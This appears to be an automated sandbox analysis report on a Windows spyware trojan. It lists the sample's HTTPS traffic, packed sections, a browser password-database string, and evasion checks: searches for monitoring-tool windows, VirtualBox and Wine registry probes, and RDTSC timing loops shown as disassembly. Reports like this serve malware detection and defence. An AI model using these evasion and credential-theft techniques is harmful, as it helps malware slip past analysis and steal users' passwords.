          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49728 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49740 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49765 version: TLS 1.2

          System Summary

          barindex
          PE file contains section with special chars
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name:
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0106E8C60_3_0106E8C6
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D90300_2_003D9030
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A98F00_2_003A98F0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DB8E00_2_003DB8E0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003AE0D80_2_003AE0D8
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A89A00_2_003A89A0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E0C800_2_003E0C80
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B95300_2_003B9530
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C3D700_2_003C3D70
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E15800_2_003E1580
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ACF050_2_003ACF05
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C87700_2_003C8770
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C17900_2_003C1790
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C08700_2_003C0870
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A40400_2_003A4040
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A68400_2_003A6840
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DC0400_2_003DC040
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005738E90_2_005738E9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DF8D00_2_003DF8D0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059A11D0_2_0059A11D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003AE9700_2_003AE970
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D99DE0_2_005D99DE
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A61A00_2_003A61A0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E9CC0_2_0056E9CC
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050B18F0_2_0050B18F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D41D00_2_003D41D0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003AB2100_2_003AB210
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A92100_2_003A9210
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A4AC00_2_003A4AC0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E935F0_2_005E935F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDB300_2_003BDB30
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040830B0_2_0040830B
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055CB0C0_2_0055CB0C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BFB600_2_003BFB60
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A2B800_2_003A2B80
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056639A0_2_0056639A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00506BA70_2_00506BA7
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E041B0_2_004E041B
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C8CB00_2_003C8CB0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A5C900_2_003A5C90
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D24E00_2_003D24E0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A94D00_2_003A94D0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A6CC00_2_003A6CC0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003AAD000_2_003AAD00
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A35800_2_003A3580
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C7E200_2_003C7E20
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C06500_2_003C0650
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00563ED10_2_00563ED1
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00567ECA0_2_00567ECA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C5E900_2_003C5E90
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E0F600_2_003E0F60
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FDFCA0_2_004FDFCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D87B00_2_003D87B0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042CFFF0_2_0042CFFF
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DC7800_2_003DC780
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A77D00_2_003A77D0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A27D00_2_003A27D0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056CFA20_2_0056CFA2
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: Section: ZLIB complexity 0.9992955942622951
          Source: file.exeStatic PE information: Section: qozugtow ZLIB complexity 0.9945777757578077
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D27B0 CoCreateInstance,0_2_003D27B0
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exe, 00000000.00000003.1448813585.0000000005649000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448392633.0000000005664000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1471828980.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1472178462.00000000056E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: file.exeStatic file information: File size 1844224 > 1048576
          Source: file.exeStatic PE information: Raw size of qozugtow is bigger than: 0x100000 < 0x198400

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qozugtow:EW;qlsbilts:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qozugtow:EW;qlsbilts:EW;.taggant:EW;
          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
          Source: file.exeStatic PE information: real checksum: 0x1c557e should be: 0x1c95c9
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: qozugtow
          Source: file.exeStatic PE information: section name: qlsbilts
          Source: file.exeStatic PE information: section name: .taggant
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0106E163 push FFFFFFDBh; iretd 0_3_0106E174
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0106E5E1 push esi; retf 0_3_0106E5E4
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0108C350 push eax; ret 0_3_0108C351
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0108CB50 push eax; retf 0_3_0108CB51
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0108CF50 push eax; iretd 0_3_0108CF51
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0108C354 push eax; ret 0_3_0108C355
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0108CB54 push eax; retf 0_3_0108CB55
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0108CF54 push eax; iretd 0_3_0108CF55
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0108C368 push 680108C3h; ret 0_3_0108C36D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0108CB68 push 680108CBh; retf 0_3_0108CB6D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0108CF68 push 680108CFh; iretd 0_3_0108CF6D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0108C360 pushad ; ret 0_3_0108C361
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0108CB60 pushad ; retf 0_3_0108CB61
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0108CF60 pushad ; iretd 0_3_0108CF61
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0108C364 pushad ; ret 0_3_0108C365
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0108CB64 pushad ; retf 0_3_0108CB65
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0108CF64 pushad ; iretd 0_3_0108CF65
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059A058 push eax; mov dword ptr [esp], ebp0_2_0059A0B6
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005ED851 push 7358FF57h; mov dword ptr [esp], ebp0_2_005ED8B4
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B8028 push esp; ret 0_2_003B802B
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DA06B push ecx; mov dword ptr [esp], esi0_2_005DA0CD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DA06B push 25A65661h; mov dword ptr [esp], eax0_2_005DA10B
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E901F push 510B6672h; mov dword ptr [esp], ebp0_2_005E9047
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E901F push 7BCEEF41h; mov dword ptr [esp], edi0_2_005E9070
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B5057 push eax; iretd 0_2_003B5058
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E78CA push ebx; mov dword ptr [esp], 3A8859BFh0_2_005E791D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E78CA push eax; mov dword ptr [esp], esp0_2_005E7961
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062E0F7 push edx; mov dword ptr [esp], ebx0_2_0062E15A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005738E9 push 050445EDh; mov dword ptr [esp], edx0_2_00573923
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005738E9 push ebx; mov dword ptr [esp], edx0_2_00573995
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005738E9 push 5ADCF211h; mov dword ptr [esp], ebx0_2_005739A5
          Source: file.exeStatic PE information: section name: entropy: 7.98162486605094
          Source: file.exeStatic PE information: section name: qozugtow entropy: 7.953498445966998

          Boot Survival

          barindex
          Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Query firmware table information (likely to detect VMs)
          Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
          Tries to detect sandboxes / dynamic malware analysis system (registry check)
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 579237 second address: 57923B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57923B second address: 579246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5782F1 second address: 5782F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57857D second address: 578583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5786FD second address: 578701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578AC5 second address: 578ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F37B4535CD6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A473 second address: 57A479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A479 second address: 57A50C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F37B4535CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F37B4535CD8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 pushad 0x0000002a mov esi, dword ptr [ebp+122D20A6h] 0x00000030 mov dx, ax 0x00000033 popad 0x00000034 push 00000000h 0x00000036 or esi, dword ptr [ebp+122D382Ch] 0x0000003c call 00007F37B4535CD9h 0x00000041 jmp 00007F37B4535CDEh 0x00000046 push eax 0x00000047 jmp 00007F37B4535CDCh 0x0000004c mov eax, dword ptr [esp+04h] 0x00000050 jmp 00007F37B4535CDAh 0x00000055 mov eax, dword ptr [eax] 0x00000057 push eax 0x00000058 push edx 0x00000059 jc 00007F37B4535CE8h 0x0000005f jmp 00007F37B4535CE2h 0x00000064 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A50C second address: 57A512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A512 second address: 57A5A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F37B4535CE4h 0x00000011 pop eax 0x00000012 movzx ecx, bx 0x00000015 push 00000003h 0x00000017 mov edx, dword ptr [ebp+122D38A0h] 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D1BABh], eax 0x00000025 push 00000003h 0x00000027 push 96AFF87Fh 0x0000002c push esi 0x0000002d jmp 00007F37B4535CE9h 0x00000032 pop esi 0x00000033 add dword ptr [esp], 29500781h 0x0000003a push edi 0x0000003b xor dword ptr [ebp+122D2397h], esi 0x00000041 pop ecx 0x00000042 lea ebx, dword ptr [ebp+1245133Fh] 0x00000048 call 00007F37B4535CDAh 0x0000004d sub dword ptr [ebp+122D2DE6h], edx 0x00000053 pop edx 0x00000054 xchg eax, ebx 0x00000055 pushad 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 jbe 00007F37B4535CD6h 0x0000005f popad 0x00000060 push eax 0x00000061 push edx 0x00000062 jo 00007F37B4535CD6h 0x00000068 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A5A2 second address: 57A5C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007F37B453709Eh 0x00000013 pop eax 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A764 second address: 57A786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F37B4535CD6h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A882 second address: 57A886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A886 second address: 57A8B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007F37B4535CD6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007F37B4535CD6h 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A8B3 second address: 57A8C1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F37B4537096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B2DB second address: 59B2FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE8h 0x00000007 pushad 0x00000008 jnp 00007F37B4535CD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5990A4 second address: 5990B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56CB53 second address: 56CB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599206 second address: 59920A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59920A second address: 599231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B4535CE0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F37B4535CE1h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599231 second address: 599236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599236 second address: 59923C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59938E second address: 599393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599393 second address: 5993A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F37B4535CDFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5993A7 second address: 5993C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F37B45370A6h 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5993C6 second address: 5993CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599579 second address: 59957D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5996D0 second address: 5996D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5996D8 second address: 5996F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F37B453709Fh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599EFF second address: 599F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599F05 second address: 599F2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F37B45370A0h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599F2C second address: 599F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599F30 second address: 599F56 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F37B4537096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F37B45370A3h 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599F56 second address: 599F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B4535CDCh 0x00000009 jnc 00007F37B4535CD6h 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F37B4535CE5h 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599F86 second address: 599F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
